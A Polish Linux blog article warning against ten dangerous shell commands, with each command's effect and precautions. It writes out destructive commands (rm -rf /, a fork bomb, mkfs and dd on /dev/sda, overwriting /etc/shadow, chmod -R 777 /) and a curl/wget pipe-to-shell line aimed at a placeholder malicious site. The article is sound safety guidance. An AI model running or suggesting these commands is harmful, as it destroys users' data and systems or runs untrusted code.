Zamknij menu
    Nowe
    shallow focus photo of person using MacBook

    Serwer Linux – zalety VPS, konfiguracja i bezpieczeństwo

    2025-09-03
    purple and yellow abstract painting

    Jak diagnozować kernel panic? Przyczyny, objawy i zapobieganie

    2025-08-31

    LibreOffice czy OpenOffice? Który pakiet biurowy lepiej spełnia Twoje potrzeby?

    2025-08-26
    Facebook X (Twitter) Instagram
    Linuksowo
    • Główna
    • Dystrybucje
    • Tematy
      • Administracja
      • Bezpieczeństwo
      • Instalacja
      • Oprogramowanie
      • Podstawy
      • Wybór systemu
      • Rozszerzenia plików
    • Pozostałe
    Linuksowo
    Główna»Pozostałe»10 niebezpiecznych poleceń Linuksa, których nie należy używać
    Pozostałe

    10 niebezpiecznych poleceń Linuksa, których nie należy używać

    Norbert BarwickiNorbert BarwickiBrak komentarzy4 min. czyt.
    Udostępnij
    Facebook Twitter LinkedIn Pinterest E-mail

    Niektóre polecenia w systemie Linux są niezwykle niebezpieczne, szczególnie jeśli zostaną użyte bez zrozumienia ich skutków. Poniżej znajdziesz rozbudowany poradnik prezentujący dziesięć najbardziej niebezpiecznych poleceń Linuksa, wyjaśnienia ich działania, zagrożenia, sposoby ich rozpoznania oraz dobre praktyki, które pozwolą Ci uniknąć krytycznych błędów.

    Spis treści pokaż
    1 1. rm -rf /
    2 2. :(){ :|: & };:
    3 3. mkfs.ext4 /dev/sda lub mkfs na istniejącym dysku
    4 4. >/etc/passwd lub echo coś >> /etc/shadow
    5 5. dd if=/dev/zero of=/dev/sda
    6 6. wget ... | sh lub curl ... | sh
    7 7. chmod -R 777 / lub chown -R
    8 8. mv /folder/* /dev/null
    9 9. kill -9 -1
    10 10. yes > /dev/sda
    11 Dobre praktyki bezpiecznej pracy w terminalu

    1. rm -rf /

    Opis –
    Polecenie to usuwa bezzwrotnie wszystkie pliki i katalogi z katalogu głównego systemu – razem z całą strukturą plików.

    Przykład użycia –

    rm -rf / 

    Dlaczego to niebezpieczne –
    Usuwa cały system operacyjny i dane bez możliwości ich odzyskania. Komenda ta nie prosi o potwierdzenie i nie zachowuje żadnych wersji kopii zapasowych.

    Jak się zabezpieczyć –

    • Nigdy nie uruchamiaj rm -rf na katalogu głównym / lub innych kluczowo ważnych katalogach systemowych.
    • Pracuj zawsze na precyzyjnie określonych ścieżkach.

    2. :(){ :|: & };:

    Opis –
    To tzw. fork bomb – specjalny łańcuch poleceń, który tworzy wykładniczo rosnącą liczbę procesów.

    Przykład użycia –

    :(){ :|:& };: 

    Dlaczego to niebezpieczne –
    Może całkowicie zablokować i „zamrozić” system, wyczerpując wszystkie zasoby procesora i pamięci RAM.

    Jak się zabezpieczyć –

    • Nie kopiuj do terminala podejrzanych jednolinijkowych poleceń, których działania nie rozumiesz.

    3. mkfs.ext4 /dev/sda lub mkfs na istniejącym dysku

    Opis –
    Polecenie formatuje wskazane urządzenie blokowe (dysk, partycję).

    Przykład użycia –

    mkfs.ext4 /dev/sda 

    Dlaczego to niebezpieczne –
    Bezpowrotnie usuwa wszystkie dane na urządzeniu wskazanym w poleceniu.

    Jak się zabezpieczyć –

    • Zawsze dokładnie sprawdzaj, które urządzenie zamierzasz formatować.
    • Twórz kopie zapasowe ważnych danych.

    4. >/etc/passwd lub echo coś >> /etc/shadow

    Opis –
    Przekierowanie wyjścia do krytycznych plików systemowych, np. pliku z hasłami.

    Przykład użycia –

    > /etc/passwd echo "test" >> /etc/shadow 

    Dlaczego to niebezpieczne –
    Możesz uszkodzić pliki odpowiedzialne za użytkowników i hasła – system może stać się nieużywalny, a dostęp do niego niemożliwy.

    Jak się zabezpieczyć –

    • Nigdy nie stosuj wyjścia poleceń do krytycznych plików systemowych bez pełnej świadomości skutków.

    5. dd if=/dev/zero of=/dev/sda

    Opis –
    Program dd potrafi wykonywać kopiowanie blokowe – w tym przypadku zerowanie całego dysku twardego.

    Przykład użycia –

    dd if=/dev/zero of=/dev/sda 

    Dlaczego to niebezpieczne –
    Całkowicie nadpisuje dane na dysku i czyni ich odzyskanie bardzo trudnym lub niemożliwym.

    Jak się zabezpieczyć –

    • Sprawdzaj opcje if (input file) oraz of (output file) w poleceniu dd i nigdy nie wskazuj nieumyślnie całych dysków lub partycji.

    6. wget ... | sh lub curl ... | sh

    Opis –
    Ściąganie skryptów z Internetu i bezpośrednie ich uruchamianie.

    Przykład użycia –

    wget http://złastrona.com/skrypt.sh | sh curl http://złastrona.com/skrypt.sh | sh 

    Dlaczego to niebezpieczne –
    Możesz uruchomić złośliwy kod bez żadnej weryfikacji.

    Jak się zabezpieczyć –

    • Zawsze pobieraj pliki skryptów najpierw do pliku, sprawdzaj ich zawartość i dopiero potem wykonuj.

    7. chmod -R 777 / lub chown -R

    Opis –
    Zmiana uprawnień dla wszystkich plików – w tym przypadkowo na plikach systemowych.

    Przykład użycia –

    chmod -R 777 / chown -R user:user / 

    Dlaczego to niebezpieczne –
    Możesz uczynić system podatnym na ataki lub spowodować niestabilność aplikacji/uruchomienia.

    Jak się zabezpieczyć –

    • Nigdy nie używaj rekursywnych opcji dla katalogu głównego.

    8. mv /folder/* /dev/null

    Opis –
    Przenoszenie zawartości do /dev/null oznacza trwałą utratę wszystkich przeniesionych danych.

    Przykład użycia –

    mv /home/user/* /dev/null 

    Dlaczego to niebezpieczne –
    Bezpowrotna utrata przenoszonych plików, ponieważ /dev/null to „czarna dziura” – cokolwiek tam trafi, znika na zawsze.

    Jak się zabezpieczyć –

    • Sprawdzaj cel przenoszenia/usuwania plików i katalogów.

    9. kill -9 -1

    Opis –
    Polecenie zabija wszystkie działające procesy użytkownika (w tym często systemowe demony).

    Przykład użycia –

    kill -9 -1 

    Dlaczego to niebezpieczne –
    Może spowodować zawieszenie całego systemu i utratę pracy, a nawet wymagać restartu serwera.

    Jak się zabezpieczyć –

    • Stosuj kill ostrożnie, określając konkretne PID-y.

    10. yes > /dev/sda

    Opis –
    Polecenie to bez przerwy wypisuje tekst do urządzenia blokowego, nadpisując je przypadkowymi danymi.

    Przykład użycia –

    yes > /dev/sda 

    Dlaczego to niebezpieczne –
    Szybko nadpisuje i uszkadza system plików, czyniąc dane nieodwracalnie utraconymi.

    Jak się zabezpieczyć –

    • Nigdy nie przekierowuj wyjścia poleceń do urządzeń blokowych.

    Dobre praktyki bezpiecznej pracy w terminalu

    • Zawsze czytaj i rozum polecenie przed jego uruchomieniem.
    • Używaj konta zwykłego użytkownika zamiast roota, gdy nie wykonujesz zadań administracyjnych.
    • Wykonuj regularne kopie zapasowe ważnych danych.
    • Zwracaj uwagę na pochodzenie skryptów, które pobierasz i uruchamiasz.
    • *Stosuj polecenia z minimalnym zasięgiem (np. działaj na konkretnym pliku, nie całym katalogu).
    • Monitoruj działania w terminalu poprzez korzystanie z polecenia history.

    Przestrzegając powyższych zasad i będąc świadomym najgroźniejszych poleceń, możesz znacząco zmniejszyć ryzyko poważnych awarii czy utraty danych pracując z Linuksem.

    Norbert Barwicki
    • WWW

    Norbert Barwicki pracuje z systemami Linux od 2007 roku, kiedy to zainstalował swoją pierwszą dystrybucję Ubuntu 7.04. Przez lata eksperymentował z ponad 15 różnymi dystrybucjami, w tym Fedora, Debian, Arch Linux i Gentoo, a od 2015 roku specjalizuje się w administracji serwerami opartymi na CentOS i Red Hat Enterprise Linux. Jako certyfikowany administrator Linux (RHCSA od 2018 roku) dzieli się swoją wiedzą na Linuksowo.pl, gdzie opublikował już ponad 100 artykułów pomagających użytkownikom w przejściu na świat open source.

    Pozostałe poradniki

    Man showing stress and frustration while working remotely on a laptop indoors.

    Jak skonfigurować plik fstab? Poradnik unikania błędów i zarządzania montowaniem partycji

    18 min. czyt.
    MacBook Air beside green leadf

    dd w Linux – zastosowania, ryzyka i alternatywy

    10 min. czyt.

    Jak skonfigurować pule pamięci masowej ZFS na Ubuntu?

    3 min. czyt.

    Jak sformatować dysk USB w systemie Linux (Ubuntu)?

    3 min. czyt.

    Jak przeglądać tabele partycji dysku w systemie Linux? 4 polecenia

    3 min. czyt.

    Jak wyświetlić listę partycji dysku twardego w Linuksie?

    3 min. czyt.
    Dodaj komentarz
    Odpowiedz Anuluj


    Poradniki
    shallow focus photo of person using MacBook

    Serwer Linux – zalety VPS, konfiguracja i bezpieczeństwo

    2025-09-03
    purple and yellow abstract painting

    Jak diagnozować kernel panic? Przyczyny, objawy i zapobieganie

    2025-08-31

    LibreOffice czy OpenOffice? Który pakiet biurowy lepiej spełnia Twoje potrzeby?

    2025-08-26
    disc, reader, reading poor, hard drive, pc, it, hard drive, hard drive, hard drive, hard drive, hard drive

    Jak używać fdisk do zarządzania partycjami na dysku twardym? Funkcje, możliwości i typy tablic partycji

    2025-08-23
    Artykuły
    Gnome

    GNOME – intuicyjne środowisko graficzne dla systemów Unix

    2025-08-21
    a row of black computers sitting on top of a table

    Jaki Linux na stary komputer? Przewodnik po lekkich dystrybucjach

    2025-08-18
    macbook air on brown wooden table

    Jak otworzyć plik DWG online? Najlepsze narzędzia do przeglądania i edytowania CAD

    2025-08-16
    O Linuksowo

    Linuksowo.pl to kompendium wiedzy dla wszystkich zainteresowanych systemami operacyjnymi opartymi na jądrze Linux. Oferujemy eksperckie artykuły obejmujące dystrybucje, instalację, bezpieczeństwo oraz oprogramowanie open source. Naszym celem jest dostarczanie praktycznych porad zarówno dla początkujących, jak i zaawansowanych użytkowników.

    © 2025 Linuksowo – Wszelkie prawa zastrzeżone.
    • Strona główna
    • O Linuksowo
    • Polityka prywatności i cookies
    • RSS
    • Kontakt

    Type above and press Enter to search. Press Esc to cancel.